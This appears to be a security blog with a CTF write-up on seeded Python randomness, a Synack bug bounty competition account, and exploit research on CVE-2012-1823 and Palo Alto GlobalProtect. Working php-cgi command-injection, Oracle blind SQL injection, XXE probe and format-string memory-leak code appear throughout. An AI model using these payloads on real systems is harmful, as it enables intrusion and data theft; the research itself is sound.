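For background, the technique behind that module (sketched here with an assumed target URL, not the module’s exact traffic) abuses php-cgi argument injection: a query string with no unencoded “=” is passed to php-cgi as command-line arguments, and the injected -d options make PHP execute the POST body.

```python
import requests

# CVE-2012-1823 sketch: the percent-encoded query string is parsed by
# php-cgi as argv, enabling -d directives that execute the request body.
url = ("http://target/php-cgi/php-cgi.exe"
       "?%2Dd+allow_url_include%3DOn+%2Dd+auto_prepend_file%3Dphp%3A%2F%2Finput")
body = "<?php system('whoami'); die(); ?>"

r = requests.post(url, data=body)
print(r.text)
```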

Bugs like this remind me to always keep an eye out for frameworks and software packages that are collections of other software libraries and services. XAMPP is a prime example because it has no built-in update mechanism and requires manual updates. Hopefully examples like this will help encourage others to always dig a little deeper on interesting targets.

Defcon 2020 Red Team Village CTF – Seeding Part 1 & 2

Defcon 2020 Red Team CTF – Seeding Part 1 & 2

Last month was Defcon and with it came the usual rounds of competitions and CTFs. With work and family I didn’t have a ton of time to dedicate to the Defcon CTF, so I decided to check out the Red Team Village CTF. The challenges for the qualifier ranged pretty significantly in difficulty as well as category, but a couple of challenges kept me grinding. The first was the fuzzing of a custom C2 server to retrieve a crash dump, which I could never get to crash (feel free to leave comments about the solution). The second was a two-part challenge called “Seeding” in the programming category that this post is about.

Connecting to the challenge service returns the following instructions:

We are also provided with the following code snippet from the server that shows how the random string is generated and how the PRNG is seeded.

The challenge seemed pretty straightforward. With the given seed and the code for generating the random string, we should be able to recover the key given enough examples. The thing that made this challenge a little different than other “seed” based crypto challenges I’ve seen is that the string is constructed using random.choice() over the key rather than just generating numbers. A little tinkering with my solution script shows that the sequence of characters generated by random.choice() varies based on the length of the parameter provided, aka the key.

This means our first objective is to determine the length of the key. We can pretty easily determine the minimal key length by recovering the complete keyspace: sampling outputs from the service until we stop getting new characters in the oracle’s output. However, this does not account for multiples of the same character in the key. So how do we get the full length of the key? We have to leverage the determinism of the sequence generated by random. If we relate random.choice() to random.randint(), we see they are actually very similar except that random.choice() just maps the next number in the random sequence to an index in the string. This means if we select a key with unique characters, we should be able to identify the sequence generated by the PRNG by noting the indexes of the generated random characters in the key. It also means these indexes, or key positions, should be consistent across keys of the same length with the same seed.

Applying this logic, we create a key index map using our custom key and then apply it to the sample fourth-iteration string provided by the server to reveal the positions of each character in the unknown key. Assuming the key is longer than our keyspace, we will replace any unknown characters with “_” until we deduce them from each sample string.
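
A minimal sketch of the index-mapping idea; the seed value, output length, and generation loop are assumptions based on the challenge snippet.

```python
import random

SEED = 1234          # seed provided by the challenge (assumed)
OUT_LEN = 32         # length of the oracle's output string (assumed)

# Local key with all-unique characters: each output character then maps
# back to exactly one index, revealing the PRNG's index sequence. Keys of
# the same length with the same seed produce the same index sequence.
local_key = "0123456789"
random.seed(SEED)
index_map = [local_key.index(random.choice(local_key)) for _ in range(OUT_LEN)]

# Apply the same index sequence to the server's observed output to place
# characters of the unknown key; unseen positions stay as "_".
server_output = "<string captured from the oracle>"
derived = ["_"] * len(local_key)
for idx, ch in zip(index_map, server_output):
    derived[idx] = ch
print("".join(derived))
```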

Now we have the ability to derive a candidate key based on the indexes we’ve mapped given our key and the provided seed. Unfortunately this alone doesn’t bring us any closer to determining the unknown key length. What happens if we change the seed? If we change the seed we get a different set of indexes and a different sampling of key characters.

In the example above, you’ll notice that no characters in our derived keys conflict. This is because we know that the key length is 10, since we generated it. What happens if we try to derive a candidate key that is not 10 characters long using the generated 4th iteration random string from a 10 character key?

It appears if the length of the key used to generate the random string is not the same length as our local key, then characters in our derived keys do not match for each index. This is great news because that means we can find the server key length by incrementing our key length from the length of our key space until our derived keys don’t conflict.

Unfortunately, this is where I got stumped during the CTF. When I looped through the different key lengths, I never got matching derived keys for the server key. After poring over my code for several hours I finally gave up and moved on to other challenges. After the CTF was over, I reached out to the challenge creator and he confirmed my approach was the right one. He was also kind enough to provide me with the challenge source code so I could troubleshoot my code. Executing the python challenge server and running my solution code yielded the following output.

So what gives??? Now it works??? I chalked it up to some coding mistake I must have magically fixed and decided to go ahead and finish out the solution. The next step is to derive the full server key by sampling the random output strings from different seeds. I simply added a loop around my previous code with an exit condition when there are no more underscores (“_”) in our key array. Unfortunately, when I submitted the key I got a socket error instead of the flag.

Taking a look at the server code I see the author already added debugging that I can use to troubleshoot the issue. The logs show a familiar python3 error in regards to string encoding/decoding.

Well that’s an easy fix. I’ll just run the server with python3 and we’ll be back in business. To my surprise re-running my script displays the following.

This challenge just doesn’t want to be solved. Why don’t my derived keys match up anymore? This feels familiar. Is it possible that different versions of python affect the sequences produced by random for the same seed?
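
A quick experiment answers that:

```python
import random

# Run this under both python2 and python3: the seed is identical, but
# random.choice() differs -- Python 2 computes int(random() * len(seq)),
# while Python 3 uses _randbelow(len(seq)) -- so the outputs diverge.
random.seed(1337)
print("".join(random.choice("abcdefghij") for _ in range(8)))
```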

Well there ya have it. Depending on the version of python you are running, you will get different outputs from random for the same seed. I’m going to assume this wasn’t intentional. Either that or the author wanted to inflict some pain on all of us late adopters 🙂 Finishing up the solution and running the server and solution code with python3 finally gave me the flags.

Even with all of the frustration I’d say it was a very satisfying challenge and I learned something new. Feel free to download the challenge and give it a go. Shout outs to @RedTeamVillage_, @nopresearcher, and @pwnEIP for hosting the CTF and especially the challenge creator @waldoirc.

Synack – Red Vs Fed Competition 2020

Preface

Obligatory statement: This blog post is in no way affiliated, sponsored, or endorsed with/by Synack, Inc. All graphics are being displayed under fair use for the purposes of this article.

Over the last few months Synack has been running a user-engagement-based competition called Red vs Fed. As can be deduced from the name, the competition was focused on penetration testing Synack’s federal customers. For those of you unfamiliar with Synack, it is a crowd-sourced hacking platform with a bug bounty type payment system. Hackers (consultants) are recruited from all over the planet to perform penetration testing services through Synack’s VPN-based platform. Some of the key differences Synack markets over other bounty platforms are a defined payout schedule based on vulnerability type and a 48-hour triage time.

Red Vs Fed

This section is going to be a general overview of my experience participating in my first hacking competition with Synack, Red Vs Fed. At times it may come off as a diatribe, so feel free to jump forward to the technical notes that follow. In order for any of this to make sense we first have to start off with the competition rules and scoring. Points were awarded per “accepted” vulnerability based on the CVSS score determined by Synack on a scale of 1-10. There were also additional multipliers added once you passed a certain number of accepted bugs. The important detail here is the word “accepted”, which means a report has to survive the myriad of exceptions, loopholes, and flat-out dismissals as it goes through the Synack triage process. The information behind all of these “rules” is scattered across various help pages accessible by red team members. Examples of some of these written, unwritten, and observed rules that will be referenced in this section:

  1. Shared code: If a report falls within about 10 different permutations of what may be guessed as shared code/same root issue, the report will be accepted at a substantially discounted payout or forced to be combined into a single report.
  2. 24 hour rule: In the first 24 hours of a new listing, any duplicate reports will be compared by triage staff and they will choose which report they feel has the highest “quality“. This is by far the most controversial and abused “feature” as it has led to report stuffing, favoritism, and even rewards given after clear violation of the Rules of Engagement.
  3. Customer rejected: Even though vulnerability acceptance and triage is marketed as being performed internally by Synack experts within 48 hours, some reports may randomly be sent to the customer for a rejection determination.
  4. Low Impact: Depending on the listing type, age of the listing, or individual triage staff, some bugs will be marked as low impact and rejected. This rule is specific to bugs that seem to be somewhat randomly accepted on targets even though they all fall into the low impact category.
  5. Dynamic Out-of-Scope: Bug types, domains, and entire targets can be taken out of scope abruptly depending on report volume. There are loopholes to this rule if you happen to find load balancers or CNAME records for the same domain targets.
  6. Target Analytics: This is a feature not a rule but it seemed fitting for this list. When a vulnerability is accepted by Synack on a target, details like the bug type and location are released to all currently enrolled on the target.

About a month into the competition I was performing some rudimentary endpoint discovery (dirsearch, Burp Intruder) on one of the legacy competition targets and had a breakthrough. I got a hit on a new virtual host on a server in the target scope, i.e. a new web application. When I come across a new application, one of the first things I try to do is tune my wordlist for the next round of endpoint enumeration. I do this using endpoints defined in the source of the page, included javascript files, and identification of common patterns in naming, e.g. prefix_word_suffix.ext. On the next round of enumeration I hit the error page below.

A bug hunter can’t ask for an easier SQL injection vulnerability: verbose error messages containing the actual SQL query with database names, table names, and column names. I whipped up a POC (discussed further down) and started putting together a report for the bug. After a little more recon, I was able to uncover and report a handful of additional SQLi vulns over the next couple of days. While continuing to discover and “prove” SQLi on more endpoints, I was first introduced to (5), as the entire domain was taken out of scope for SQLi. No worries, at least my bugs were submitted, so no one else should be able to swoop in and clean up my leftovers. Well, not exactly; it just so happened that there was a load balancer in front of my target as well as a defined CNAME (alias) for my domain. This meant that, thanks to (6), another competitor saw my bugs, knew about this loophole, and was able to submit an additional 5 SQLi on this aliased domain before another dynamic OOS was issued.

At this point, the race was on to report as many vulnerabilities on this new web application as possible now that my discovery was public to the rest of the competitors via analytics. I managed to get in a pretty wide range of vulnerabilities on the target, but they were pretty well split with the individual that was already in second place, putting him into first place. With this web application pretty well picked through, I began looking for additional vhosts on new subdomains in hopes of finding similarly vulnerable applications. I also began to strategize about how best to submit vulnerabilities in regards to timing and grouping, realizing these nuances could be the difference between other competitors scooping them up, Synack taking them out of scope, or reports being forced to be combined.

A couple of weeks later I caught a lucky break. I came across a couple more web applications on a different subdomain that appeared to be using the same web technologies as my previous find and, hopefully, similarly buggy code. As I started enumerating the targets, the bugs started stacking up. This time I took a different approach. Knowing that as soon as my reports hit analytics it would be a feeding frenzy amongst the other competitors, I began queuing up reports without submitting them. After I had exhausted all the bugs I could find, I began to submit the reports in chunks: sized just under what I expected Synack’s tolerance to be before issuing the vulnerability class OOS, but in small enough windows that other competitors hopefully wouldn’t be able to beat me to submission by watching analytics. Thankfully, I was able to slip in all of the reports just before the entire parent domain was taken OOS by Synack.

Back to the grind… After the last barrage of vulnerability submissions I managed to get dozens of websites taken out of scope so I had to set my sights on a new target. Luckily I had managed to position myself in first place after all of the reports had been triaged.

Nothing new here, lots of recon and endpoint enumeration. I began brute-forcing vhosts on domains that were shown to host multiple web applications in an attempt to find new ones. After some time I stumbled across a new web application on a new vhost. This application appeared to have functionality broken out into 3 distinct groupings. Similar to my previous finds, I came across various bug types related to access control issues, PII disclosure, and unauthorized data modification. I followed my last approach and began to line up submissions until I had finished assessing the web application. I then began to stagger the submissions based on the groupings I had identified.

Unfortunately things didn’t go as well this time. The triage time started dragging on, so I got nervous I wouldn’t be able to get all of my reports in before the target was put out of scope. I decided to go ahead and submit everything. This was a mistake. When the second group of reports hit, the triage team decided that all 6 of the reports stemmed from the same access control issue. They accepted a couple as (1) shared code for 10% payout, then pushed back a couple more to be combined into one report. I pleaded my case to more than one of the triage team members but was overruled. After it was all said and done, they distilled dozens of vulnerabilities across over 20 endpoints into 2 reports that would count towards the competition and then put the domain OOS (5). Oh well… I was already in first, so I probably shouldn’t make a big stink, right?

Over the next month it would seem I was introduced to pretty much every way reports could be rejected unless the bug was a clear CVSS 10 (this is obviously an exaggeration, but these bug types are regularly accepted on the platform).

1.   User account state modification (Self Activation/Auth Bypass, Arbitrary Account Lockout) – initially rejected, appealed it and got it accepted

2.   PII Disclosure – Rejected as  (3). Claimed as customer won’t fix

3.   User Login Enumeration on a target with a NIST SP 800-53 requirement – Rejected as (3) and (4) – even though an email submission captcha bypass was accepted on the same target… Really???

4.   Phpinfo page – Rejected as  (4) even though these are occasionally accepted on web targets

5.   Auth Bypass/Access Control issue – Endpoint behind a site’s login portal allowed for the live viewing of CC feeds – Rejected as (4) with the following

6.   Unauthenticated, on-demand reboot of a network protection device – Rejected as (3) even though the exact same vulnerability had been accepted on a previous listing literally 2 days prior, with points awarded toward the competition. The dialog I had with the organizer about the issue is below:

At this point it really started to feel like I was fighting an unwinnable battle against the Synack triage team. 6 of my last 8 submissions had been rejected for some reason or another, and the other 2 I had to fight for. Luckily the competition would be over shortly and there were very few viable targets eligible for the competition. With 2 days remaining in the competition, I was still winning by a couple of bugs.

I wish I could say everything ended uneventfully 2 days later, but what good Synack sob story doesn’t include the infamous 24 hour rule (2)? To make things interesting, a web target was released roughly 2 days before the end of the competition. I mention “web” because the acceptance criteria for “low impact” (4) bugs are typically lowered for these assessment types, which means it could really shake up the scoreboard. Well, here we go…

I approached the last target like a CTF: only 48 more hours to hopefully secure the win. Ironically, the last target had a bit of a CTF feel to it. After navigating the application a little, it became obvious that the target was a test environment that had already undergone similar pentests. It was littered with persistent XSS payloads that had been dropped over a year prior. These “former” bugs served as red herrings, as the application was no longer vulnerable to them even though the payloads persisted. I presume they also served as a time suck for many since, under the 24 hour rule (2), any red teamer could win the bug if their report was deemed the “best” submission. Unfortunately, with only a few hours into the test the target became very unstable. The server didn’t go down, but it became nearly impossible to log in to, regularly returning an unavailable message as if being DOS-ed. Rather than continue to fight with it, I hit the sack with hopes that it would be up in the morning.

First thing in the morning I was back on it. With only 12 hours left in the 24 hour rule (or so I thought) I needed to get some bugs submitted. I came across an arbitrary file upload with a preview function that looked buggy.

The file preview endpoint contained an argument that specified the filename and mimetype. Modifying these parameters changed the response Content-Type and Content-Disposition (whether the response is displayed or downloaded) headers.

I got the vulnerability written up and submitted before the end of the 24 hour rule. Since persistent XSS has a higher payout and higher CVSS score on Synack, I chose this vulnerability type rather than arbitrary file upload. Several hours after my submission, an announcement was made that due to the unavailability of the application the night before (possible DOS), the 24 hour rule would be extended 12 hours. Well, that sux… that means I would now be competing with more, possibly better-quality reports for the bug I had just submitted. Time to go look for more bugs and hopefully balance it out.

After some more trolling around, I found an endpoint that imported records into a database using a custom XML format. Features like this are prime candidates for XXE vulnerabilities. After some testing I found it was indeed vulnerable to blind XXE. XXE bugs are very interesting because of the various exploit primitives they can provide. Depending on the XML parser implementation, the application configuration, system platform, and network connectivity, these bugs can be used for arbitrary file read, SSRF, and even RCE. The most effective way to exploit XXEs is if you have the XML specification for the object being parsed. Unfortunately for me, the documentation for the XML file format I was attacking was behind a login page that was out of scope. I admit I probably spent too much time on this bug, as the red teamer in me wanted RCE. I could get it to download my DTD file and open files, but I couldn’t get it to leak the data.

Since I couldn’t get LFI working, I used the XXE to perform a port scan of the internal server to at least ensure I could submit the bug as SSRF. I plugged the payload into Burp Intruder and set it on its way to enumerate all the open ports, using a probe like the sketch below.
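
The probe looked conceptually like this; the record element is hypothetical. Burp Intruder iterates the port number, and differences in response time or error messages reveal open ports.

```xml
<?xml version="1.0"?>
<!DOCTYPE records [
  <!ENTITY xxe SYSTEM "http://127.0.0.1:8080/">
]>
<records>&xxe;</records>
```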

After I got the report written up for SSRF, I held off on submission in hopes I could get the arbitrary file read (LFI) to work and maybe pull off remote code execution. Unfortunately, about this time the server started to get unstable again. For the second night in a row it appeared as if someone was DOS-ing the target, and it alternated between crawling and unavailable. Again I decided to go to bed in hopes that by morning it would be usable.

Bright and early I got back to it, only 18 hours left in the competition and the target was up albeit slow. I spent a couple more hours on my XXE but with no real progress. I decided to go ahead and submit before the extended 24 hour rule expired to again hopefully ensure at least a chance at winning a possible “best” report award. Unsurprisingly, a couple hours later the 24 hour rule was extended again (because of the DOS) with it ending shortly before the end of the competition. On this announcement I decided I was done. While the reason behind the extension made sense, this could effectively put the results of the competition in the hands of the triage team as they arbitrarily chose best reports for any duplicated submissions.

The competition ended and we awaited the results. Based on analytics and my report numbers, I determined that the bug submission count on the new target was pretty low. As the bugs started to roll in, this theory was confirmed. There were roughly 8 or so reports after accounting for combined endpoints. My XXE got awarded as a unique finding and my persistent XSS got duped under the 24 hour rule that was extended to 48. Shocking, extra time leads to better reports. Based on the scoreboard, the person in second must have scored every other bug on the board except 1, largely all reflected XSS. For those familiar with Synack, this would actually be quite a feat because XSS is typically the most duped bug on the platform, meaning they likely won best report for several other collisions. I’d like to say good game, but it certainly didn’t feel like it.

Technical Notes of Interest

The techniques used to discover and exploit most of the vulnerabilities I found are not new. That said, I did learn a few new tricks and wrote a couple new scripts that seemed worth sharing.

  • SQL Injection

SQL injection bugs were my most prevalent find in the competition. Unlike other bug bounty platforms, Synack typically requires full exploitation of vulnerabilities for full payout. With SQL injection, database names, columns, tables, and table dumps are typically requested to “prove” exploitation rather than basic injection tests or SQL errors. While I was able to get some easy wins with sqlmap on several of the endpoints, some of the more complex queries required custom scripts to dump data from the databases. This necessity produced two new POCs I will describe below.

In my experience a large percentage of modern SQL injection bugs are blind. By blind, I’m referring to SQLi bugs that are not able to return data from the database in the request response. That said, there are also different kinds of blind SQLi: bugs that return error messages and those that do not (completely blind). The first POC is an example of an HTTP GET, time-based boolean exploit for a completely blind SQL injection vulnerability on an Oracle database. The main difference between this POC and previous examples in my github repository is the following SQL query.

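A sketch of the technique (the endpoint, parameter, and subquery are placeholders, not the original POC): DBMS_PIPE.RECEIVE_MESSAGE blocks for the specified number of seconds, so the response time encodes the boolean result.

```python
import time
import requests

# Placeholder endpoint/parameter -- time-based boolean test for Oracle.
PAYLOAD = ("' AND 1=(SELECT CASE WHEN ASCII(SUBSTR(({subq}),{pos},1)) > {guess} "
           "THEN DBMS_PIPE.RECEIVE_MESSAGE('x',{delay}) ELSE 1 END FROM DUAL)--")

def char_gt(subq, pos, guess, delay=5):
    inj = PAYLOAD.format(subq=subq, pos=pos, guess=guess, delay=delay)
    start = time.time()
    requests.get("http://target/page", params={"id": "1" + inj}, timeout=delay + 30)
    return (time.time() - start) >= delay   # slow response -> condition true
```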

The returned table is two columns of type string, and this query performs a boolean test against a supplied character limit; if the test passes, the database sleeps for a specified timeout. The response time is then measured to verify the boolean test.

The second POC is an example of an HTTP GET, error-based boolean exploit for a partially blind SQL injection vulnerability on an Oracle database. This POC targets a vulnerability that can be forced to produce two different error messages.

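Again a sketch rather than the exact payload: the CASE expression calls UTL_INADDR.GET_HOST_NAME only when the condition is true; on a system where that package is disabled, the call raises an ORA-24247 access-denied error, and the presence of that error in the response encodes the boolean.

```python
import requests

# Placeholder endpoint/parameter -- error-based boolean test for Oracle.
PAYLOAD = ("' AND (SELECT CASE WHEN ASCII(SUBSTR(({subq}),{pos},1)) > {guess} "
           "THEN UTL_INADDR.GET_HOST_NAME('x') ELSE 'a' END FROM DUAL) = 'a'--")

def char_gt(subq, pos, guess):
    inj = PAYLOAD.format(subq=subq, pos=pos, guess=guess)
    r = requests.get("http://target/page", params={"id": "1" + inj})
    return "ORA-24247" in r.text            # error raised -> condition true
```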

The error message used for the boolean test is forced by the payload in the event that the “UTL_INADDR.get_host_name” function is disabled on the target system. Both of the POCs extract strings from the database a character at a time using the binary search algorithm below.

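In sketch form, using either char_gt oracle from above:

```python
def extract_char(subq, pos, oracle):
    # Binary search over printable ASCII: ~7 requests per character
    # instead of ~95 with a linear scan.
    lo, hi = 32, 126
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(subq, pos, mid):   # True -> character code > mid
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)

def extract_string(subq, length, oracle):
    return "".join(extract_char(subq, i + 1, oracle) for i in range(length))
```
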
  • Remote Code Execution (Unrestricted File Upload)

Probably one of the more interesting of my findings was a file extension blacklist bypass I found for a file upload endpoint. This particular endpoint was on a ColdFusion server and appeared to have no allowedExtensions defined, as I could upload almost any file type. I say almost because a small subset of extensions was blocked with the following error.

Further research found that the ability to upload arbitrary file types had been allowed until recently, when someone reported it as a vulnerability and it was issued CVE-2019-7816. The patch released by Adobe created a blacklist of dangerous file extensions that could no longer be uploaded using cffile upload.

This got me thinking: where there is a blacklist, there is the possibility of a bypass. I googled around for a large file extension list and loaded it into Burp Intruder. After burning through the list, I reviewed the results to see a 500 error on the “.ashx” extension with a message indicating the content of my file was being executed. A little googling later, I replaced my file with a simple ASHX webshell from the internet and passed it a command. Bingo.

Wrap Up

Overall the competition proved to be a rewarding experience, both financially and academically. It also helped knowing that each vulnerability found was one less that could be used to attack US federal agencies. The prevailing criticism I have is that winning became more about exploiting the platform, its policies, and its people than about finding vulnerabilities. In CTFs this isn’t particularly unusual for newer contests, which seem to forget (or not care) about the “meta” surrounding the competition itself. Hopefully, in future competitions some of the nuanced issues surrounding vulnerability acceptance and payout can be detached from the competition scoring. My total tally of vulnerabilities against federal targets is displayed below.

Bug Type                  Count  CVSS (Competition Metric)
SQL Injection             12     10
Access Control            8      5-9
Remote Code Execution     6      10
Persistent XSS            5      9
Authentication Bypass     2      8-9
Local File Include        2      8
Path Traversal            1      8
XXE                       1      5
Rejected/Combined/Duped   16     0

On June 8th it was announced that I had taken 2nd place in the competition and won $15,000 in prize money.

Given the current global pandemic, we decided to donate the prize money to 3 organizations who focus on helping the less fortunate: Water Mission, Low Country Foodbank, and Build Up. For any of you reading this that may have a little extra in these trying times, consider donating to your local charities to support your communities.

A Year of Windows Privilege Escalation Bugs

A Year of Windows Privilege Escalation Bugs

Earlier last year I came across an article by Provadys (now Almond) highlighting several bugs they had discovered based on research by James Forshaw of Google’s Project Zero. The research focused on the exploitation of Windows elevation of privilege (EOP) vulnerabilities using NTFS junctions, hard links, and a combination of the two that Forshaw coined Windows symlinks. James also released a handy toolset to ease the exploitation of these vulnerabilities called the symbolic testing toolkit. Since they have done such an excellent job describing these techniques already, I won’t rehash their inner workings. The main purpose of this post is to showcase some of our findings and how we exploited them.

Findings

My initial target set was software covered under a bug bounty program. After I had exhausted that group I moved on to Windows services and scheduled tasks. The table below details the vulnerabilities discovered and any additional information regarding the bugs.

Vendor     Arbitrary File  ID              Date Reported  Reference  Reward
(private)  Write           Undisclosed     04/06/2019     Hackerone  500
Ubiquiti   Delete          CVE-2020-8146   04/08/2019     Hackerone  667
Valve      Write           CVE-2019-17180  05/16/2019     Hackerone  1250
(private)  Write           Undisclosed     04/19/2019     Bugcrowd   600
Thales     Write           CVE-2019-18232  10/15/2019     ICS-CERT   N/A
Microsoft  Read/Write      CVE-2019-1077   05/06/2019     Microsoft  N/A
Microsoft  Write           CVE-2019-1267   05/08/2019     Microsoft  N/A
Microsoft  Write           CVE-2019-1317   09/16/2019     Microsoft  N/A

PreAuth RCE on Palo Alto GlobalProtect Part II (CVE-2019-1579)

Background

Before I get started I want to clearly state that I am in no way affiliated, sponsored, or endorsed with/by Palo Alto Networks. All graphics are being displayed under fair use for the purposes of this article.

I recently encountered several unpatched Palo Alto firewall devices during a routine red team engagement. These particular devices were internet facing and configured as Global Protect gateways. As a red teamer/bug bounty rookie, I am often asked by customers to prove the exploitability of vulnerabilities I report. With bug bounty, this will regularly be a stipulation for payment, something I don’t think is always necessary or safe in production. If a vulnerability has been proven to be exploitable by the general security community, CVE issued, and patch developed, that should be sufficient for acceptance as a finding. I digress…

The reason an outdated Palo Alto GlobalProtect gateway caught my eye was a recent blog post by DEVCORE team members Orange Tsai (@orange_8361) and Meh Chang (@mehqq_). They identified a pre-authentication format string vulnerability (CVE-2019-1579) that had been silently patched by Palo Alto a little over a year earlier (June 2018). The post also provided instructions for safely checking for the existence of the vulnerability, as well as a generic POC exploit.

Virtual vs Physical Appliance

If you’ve made it this far, you’re probably wondering why there’s a need for another blog post if DEVCORE already covered things. According to their post, “the exploitation is easy,” given you have the right offsets in the PLT and GOT and assuming the stack is aligned consistently across versions. In reality, however, I found that obtaining these offsets and determining the correct instance type and version was the hard part.

Palo Alto currently markets several next-generation firewall deployments that can be broadly categorized as physical or virtual. The exploitation details in the DEVCORE article are based on a virtual instance, AWS in their scenario. How, then, do you determine whether the target device you are investigating is virtual or physical? In my experience, one of the easy ways is the IP address. Companies often do not set up custom reverse DNS records for their virtual instances, so if the IP/DNS belongs to a major cloud provider, chances are it’s a virtual appliance.
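As a quick illustration of that heuristic, here is a minimal reverse-DNS check; the suffix list and target IP are illustrative, not exhaustive.

```python
# Sketch: guess virtual vs physical from the PTR record of the target.
import socket

CLOUD_SUFFIXES = (".amazonaws.com", ".cloudapp.azure.com", ".googleusercontent.com")

def looks_virtual(ip: str) -> bool:
    try:
        host, _, _ = socket.gethostbyaddr(ip)   # reverse DNS lookup
    except socket.herror:
        return False                            # no PTR record; inconclusive
    return host.lower().endswith(CLOUD_SUFFIXES)

print(looks_virtual("203.0.113.10"))            # hypothetical target IP
```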

If you determine that the firewall is an AWS instance, head over to the AWS Marketplace and spin up a Palo Alto VM. One of the first things you’ll notice is that you are limited to only the newest releases of 8.0.x, 8.1.x, and 9.0.x.

Don’t worry, you can actually upgrade and downgrade the firmware from the management web interface once the instance has been launched… if you have a valid support license for the appliance. There are some nuances, however: if you launch 9.0.x, it can only be downgraded to 8.1.x. Another very important detail is to select an "m4" instance when you plan to downgrade to 8.x.x, or the AWS instance will be unreachable and thus unusable. For physical devices, the supported firmware can be found here.

Getting ahold of a valid support license varies in difficulty and price. If you are using the AWS Firewall Bundle, the license is included. If it’s a physical device, it can get complicated and expensive. If you buy the device new from an authorized reseller, you can activate a trial license. If you buy one through something like eBay and it’s a "production" device, make sure the seller transfers the license to you; otherwise you may have to pay a "recertification" fee. If you get really lucky and the device you buy happens to be an RMA-ed device, it will show as a spare when you register it: you get no trial license, you have to pay a fee to get it transferred to production, and then you have to buy a support license.

Once you have the appliance up and running with the version you want to test, you will need to configure a GlobalProtect gateway on one of the interfaces. There are a couple of YouTube videos out there that go over some of the installation steps, but you basically just have to step your way through it until it works. Palo Alto provides some documentation that you can use as a reference if you get stuck. One of the blocking requirements is installing an SSL certificate for the GlobalProtect gateway. The easiest option here is to generate a self-signed certificate and import it; a simple guide can be found here. Supposedly one can be generated on the device as well.

If you are setting up an AWS instance, you will need to change a key setting on the network interface or the GlobalProtect gateway will not be accessible. Go to the network interface that is being used for the GlobalProtect interface in AWS, right-click, and select "Change Source/Dest Check". Change the value to "Disabled" as shown below. The same change can also be scripted; see the sketch that follows.
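If you prefer scripting the change over clicking through the console, the equivalent call through boto3 looks roughly like this (the interface ID is a placeholder):

```python
# Sketch: disable Source/Dest Check on the GlobalProtect ENI via boto3.
import boto3

ec2 = boto3.client("ec2")
ec2.modify_network_interface_attribute(
    NetworkInterfaceId="eni-0123456789abcdef0",  # placeholder: your GP interface
    SourceDestCheck={"Value": False},            # same as "Disabled" in the console
)
```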

Exploitation

Alright, the vulnerable device firmware is installed and the GlobalProtect gateway is configured, so we’re at the easy part, right??? Well, not exactly… When you SSH into the appliance, you’ll find yourself in a custom restricted shell with very limited capabilities.

In order to get those memory offsets for the exploit, we need access to the sslmgr binary. This is going to be kinda hard to pull off in a restricted shell. Previous researchers found at least one escape, but it appears to have been fixed. If another such technique worked, you could theoretically download each firmware version, copy the binary off the device, and retrieve the offsets.

What do we do if we can’t find such a jailbreak… for every version??? Well, it turns out we may be able to use some of the administrative functions of the device, and the nature of the vulnerability itself, to help us. One of the features the limited shell provides is the ability to increase the verbosity of the logs generated by key services. It also allows you to tail the log file for each service. Given that the vulnerability is a format string bug, could we leak memory into the log and then read it out? Let’s take a look at the bug(s).

And immediately following is the exact code we were hoping for. It must be our lucky day.

So as long as we populate those four parameters, we can pass format string operators to dump memory from the process into the log. Why is this important? It means we can dump the entire binary from memory and retrieve the offsets we need for the exploit. Before we can do that, we first need to identify the offsets to the buffers on the stack for each of our parameters. I developed a script, which you can grab from Github, that locates the specified parameters on the stack and prints out the associated offsets; a rough sketch of the idea follows.
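This is a sketch, not the Github script itself: the /sslmgr endpoint and the scep-profile-name parameter come from the public write-ups, the second parameter name is hypothetical, and in practice the formatted output is read back by tailing the sslmgr log rather than from the HTTP response.

```python
# Sketch: find the stack index where one of our request buffers lands.
import requests
import urllib3

urllib3.disable_warnings()
TARGET = "https://gateway.example.com/sslmgr"   # hypothetical target gateway

def probe(fmt: str) -> str:
    # Raw body: the parameters are split on '&' server-side with no URL
    # decoding, so we must not let requests percent-encode the payload.
    body = f"scep-profile-name={fmt}&user-email=" + "A" * 8
    return requests.post(TARGET, data=body, verify=False, timeout=10).text

for idx in range(1, 256):
    # %N$p prints the raw value in stack slot N; when our planted 0x41
    # bytes show up, that slot is a buffer we control.
    if "4141414141414141" in probe(f"%{idx}$p"):
        print(f"[+] controlled buffer found at stack index {idx}")
        break
```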

The script should output something like the screenshot below. Each of these offsets points to a buffer on the stack that we control. We can now select one, populate it with whatever memory address we like, and then use the %s format operator to read the memory at that location.

As is typical, there are some problems we have to work around to get accurate memory dumps. Certain bad characters will cause unintended output: \x00, \x25, and \x26.

Null bytes cause a problem because sprintf and strlen treat a null byte as the end of a string. A workaround is to use a format string that points to a null byte at a known index, e.g. %10$c.

The \x25 character breaks our dump because it is the format string character %. We can easily escape it by doubling it: \x25\x25.

The \x26 character is a little trickier. It is an issue because it is the token for splitting the HTTP parameters. Since ampersands aren’t reliably present on the stack at known indexes, we just write some to a known index using %n and then reference that index whenever we encounter an address containing \x26. The byte handling is sketched below.
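A minimal sketch of that byte handling, assuming big-endian MIPS addressing; the known-stack-index fallbacks for NUL and ampersand are simplified to an error here:

```python
# Sketch: prepare an 8-byte address for inclusion in the payload.
def encode_addr(addr: int) -> bytes:
    out = bytearray()
    for b in addr.to_bytes(8, "big"):       # big-endian MIPS target
        if b == 0x25:                       # '%' would start a format op
            out += b"\x25\x25"              # escape by doubling
        elif b in (0x00, 0x26):             # NUL / '&' can't travel in the body
            # fall back to the known-stack-index tricks described above
            raise ValueError(f"byte {b:#04x} needs the stack-index workaround")
        else:
            out.append(b)
    return bytes(out)
```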

Putting this all together, I modified my previous script to write a user-supplied address to the stack, dereference it using the %s format operator, and then output the data at that address to the log. Wrapping this logic in a loop, combined with our handling of special characters, allows us to dump large chunks of memory at any readable location. You can find a MIPS version of this script on our Github, and executing it should give you output that looks something like the screenshot below.
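The overall shape of the dump loop is roughly the following sketch, with leak() standing in for the request-and-tail-the-log round trip from the script:

```python
# Sketch: dump a memory range using the %s read primitive.
def leak(addr: int) -> bytes:
    """Place addr in our controlled buffer, trigger %s, read bytes from the log."""
    raise NotImplementedError   # wire this to the format string primitive

def dump(start: int, length: int) -> bytes:
    data, addr = b"", start
    while len(data) < length:
        piece = leak(addr)
        if not piece:            # %s stopped immediately: a NUL lives at addr
            piece = b"\x00"
        data += piece
        addr += len(piece)
    return data[:length]

# usage (once leak() is wired up):
#   open("sslmgr.dump", "wb").write(dump(0x10000000, 0x40000))  # illustrative
```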

